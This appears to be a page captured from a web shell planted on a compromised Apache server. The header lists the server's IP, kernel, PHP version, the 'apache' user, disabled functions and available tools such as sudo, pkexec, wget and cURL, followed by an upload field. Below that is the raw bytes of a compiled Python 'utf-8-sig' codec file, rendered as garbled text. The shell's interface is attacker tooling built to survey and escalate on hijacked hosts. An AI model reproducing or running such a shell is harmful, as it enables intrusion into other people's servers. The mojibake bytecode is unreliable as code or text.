| Server IP : 182.53.201.61 / Your IP : 216.73.217.175 Web Server : Apache/2.2.15 (Fedora) System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686 User : apache ( 48) PHP Version : 5.3.3 Disable Function : NONE MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/lib/python2.6/encodings/ |
Upload File : |
Ñò ÉÉŽJc @ s› d Z d d k Z d d „ Z d d „ Z d e i f d „ ƒ YZ d e i f d „ ƒ YZ d e i f d „ ƒ YZ d e i f d „ ƒ YZ d „ Z d S( s Python 'utf-8-sig' Codec This work similar to UTF-8 with the following changes: * On encoding/writing a UTF-8 encoded BOM will be prepended/written as the first three bytes. * On decoding/reading if the first three bytes are a UTF-8 encoded BOM, these bytes will be skipped. iÿÿÿÿNt strictc C s' t i t i | | ƒ d t | ƒ f S( Ni ( t codecst BOM_UTF8t utf_8_encodet len( t inputt errors( ( s) /usr/lib/python2.6/encodings/utf_8_sig.pyt encode s c C sW d } | d t i j o | d } d } n t i | | t ƒ \ } } | | | f S( Ni i ( R R t utf_8_decodet True( R R t prefixt outputt consumed( ( s) /usr/lib/python2.6/encodings/utf_8_sig.pyt decode s t IncrementalEncoderc B s) e Z d d „ Z e d „ Z d „ Z RS( R c C s t i i | | ƒ t | _ d S( N( R R t __init__R t first( t selfR ( ( s) /usr/lib/python2.6/encodings/utf_8_sig.pyR s c C sM | i o( t | _ t i t i | | i ƒ d St i | | i ƒ d Sd S( Ni ( R t FalseR R R R ( R R t final( ( s) /usr/lib/python2.6/encodings/utf_8_sig.pyR s c C s t i i | ƒ t | _ d S( N( R R t resetR R ( R ( ( s) /usr/lib/python2.6/encodings/utf_8_sig.pyR % s ( t __name__t __module__R R R R ( ( ( s) /usr/lib/python2.6/encodings/utf_8_sig.pyR s t IncrementalDecoderc B s&